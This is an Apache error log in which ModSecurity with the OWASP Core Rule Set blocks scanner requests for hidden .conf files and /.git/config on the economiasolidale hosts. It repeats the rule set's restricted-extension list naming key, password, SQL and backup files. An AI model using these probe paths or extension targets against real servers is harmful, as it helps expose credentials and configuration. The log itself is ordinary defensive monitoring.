[Tue May 27 15:16:25.214258 2025] [:error] [pid 3434646] [client 185.146.232.218:6640] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "aDW7KQBjkyyU9gihc4sPBwAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:16:25.214440 2025] [:error] [pid 3434646] [client 185.146.232.218:6640] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "aDW7KQBjkyyU9gihc4sPBwAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:29:02.590828 2025] [:error] [pid 3435307] [client 185.146.232.218:63574] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config/wo.conf"] [unique_id "aDW-Hv8iIWre8jY-cNxR6gAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:29:02.591430 2025] [:error] [pid 3435307] [client 185.146.232.218:63574] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/wo.conf"] [unique_id "aDW-Hv8iIWre8jY-cNxR6gAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:29:02.591618 2025] [:error] [pid 3435307] [client 185.146.232.218:63574] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/wo.conf"] [unique_id "aDW-Hv8iIWre8jY-cNxR6gAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:31.926318 2025] [:error] [pid 3435317] [client 185.146.232.218:45654] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "aDW-d34CeMAvTJAIhKuk7QAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:31.928242 2025] [:error] [pid 3435317] [client 185.146.232.218:45654] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "aDW-d34CeMAvTJAIhKuk7QAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:31.928489 2025] [:error] [pid 3435317] [client 185.146.232.218:45654] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "aDW-d34CeMAvTJAIhKuk7QAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:42.140807 2025] [:error] [pid 3435311] [client 185.146.232.218:47448] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "aDW-gscVU5YaHAERsMJjdgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:42.142402 2025] [:error] [pid 3435311] [client 185.146.232.218:47448] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "aDW-gscVU5YaHAERsMJjdgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:42.142601 2025] [:error] [pid 3435311] [client 185.146.232.218:47448] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "aDW-gscVU5YaHAERsMJjdgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:51.027429 2025] [:error] [pid 3434642] [client 185.146.232.218:45408] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "aDW-i_oteRZm3UET_KXSyQAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:51.027978 2025] [:error] [pid 3434642] [client 185.146.232.218:45408] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "aDW-i_oteRZm3UET_KXSyQAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:51.028160 2025] [:error] [pid 3434642] [client 185.146.232.218:45408] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "aDW-i_oteRZm3UET_KXSyQAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:52.465020 2025] [:error] [pid 3434646] [client 185.146.232.218:45410] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "aDW-jABjkyyU9gihc4sPFgAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:52.465566 2025] [:error] [pid 3434646] [client 185.146.232.218:45410] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "aDW-jABjkyyU9gihc4sPFgAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:30:52.465744 2025] [:error] [pid 3434646] [client 185.146.232.218:45410] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "aDW-jABjkyyU9gihc4sPFgAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 21:31:32.971077 2025] [:error] [pid 3447773] [client 93.123.109.7:36926] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDYTFHFGer-qPqmHQ6pUtQAAAAA"]
[Tue May 27 21:31:32.971405 2025] [:error] [pid 3447773] [client 93.123.109.7:36926] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDYTFHFGer-qPqmHQ6pUtQAAAAA"]
[Tue May 27 21:31:32.971578 2025] [:error] [pid 3447773] [client 93.123.109.7:36926] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDYTFHFGer-qPqmHQ6pUtQAAAAA"]
[Thu May 29 03:36:05.466392 2025] [:error] [pid 3487172] [client 45.148.10.80:60782] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDe6BQ3Sa_O6seXKoTbxIQAAAAQ"]
[Thu May 29 03:36:05.467821 2025] [:error] [pid 3487172] [client 45.148.10.80:60782] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDe6BQ3Sa_O6seXKoTbxIQAAAAQ"]
[Thu May 29 03:36:05.467986 2025] [:error] [pid 3487172] [client 45.148.10.80:60782] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDe6BQ3Sa_O6seXKoTbxIQAAAAQ"]
[Thu May 29 17:52:29.314565 2025] [:error] [pid 3495726] [client 45.148.10.80:32854] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDiCvUemvl3JyWb3VasokwAAAAk"]
[Thu May 29 17:52:29.314854 2025] [:error] [pid 3495726] [client 45.148.10.80:32854] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDiCvUemvl3JyWb3VasokwAAAAk"]
[Thu May 29 17:52:29.315008 2025] [:error] [pid 3495726] [client 45.148.10.80:32854] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDiCvUemvl3JyWb3VasokwAAAAk"]
[Thu May 29 18:04:54.931482 2025] [:error] [pid 3487171] [client 45.148.10.80:33286] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDiFpmoZWF_Xb-EREHSaJwAAAAM"]
[Thu May 29 18:04:54.931725 2025] [:error] [pid 3487171] [client 45.148.10.80:33286] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDiFpmoZWF_Xb-EREHSaJwAAAAM"]
[Thu May 29 18:04:54.931893 2025] [:error] [pid 3487171] [client 45.148.10.80:33286] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDiFpmoZWF_Xb-EREHSaJwAAAAM"]
[Fri May 30 00:13:46.655651 2025] [:error] [pid 3511260] [client 93.123.109.108:46610] [client 93.123.109.108] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDjcGtRo6qfnfNN8R-NZjgAAAAM"]
[Fri May 30 00:13:46.655923 2025] [:error] [pid 3511260] [client 93.123.109.108:46610] [client 93.123.109.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDjcGtRo6qfnfNN8R-NZjgAAAAM"]
[Fri May 30 00:13:46.656100 2025] [:error] [pid 3511260] [client 93.123.109.108:46610] [client 93.123.109.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDjcGtRo6qfnfNN8R-NZjgAAAAM"]
[Fri May 30 11:26:59.909361 2025] [:error] [pid 3513603] [client 45.144.212.129:47316] [client 45.144.212.129] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDl543uS_-XRAj3G0gcfUwAAAAQ"]
[Fri May 30 11:26:59.909703 2025] [:error] [pid 3513603] [client 45.144.212.129:47316] [client 45.144.212.129] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDl543uS_-XRAj3G0gcfUwAAAAQ"]
[Fri May 30 11:26:59.909875 2025] [:error] [pid 3513603] [client 45.144.212.129:47316] [client 45.144.212.129] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDl543uS_-XRAj3G0gcfUwAAAAQ"]
[Fri May 30 13:15:04.645170 2025] [:error] [pid 3513617] [client 45.148.10.80:54872] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDmTODMAKaqM3U_Do9qSRgAAAAU"]
[Fri May 30 13:15:04.645436 2025] [:error] [pid 3513617] [client 45.148.10.80:54872] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDmTODMAKaqM3U_Do9qSRgAAAAU"]
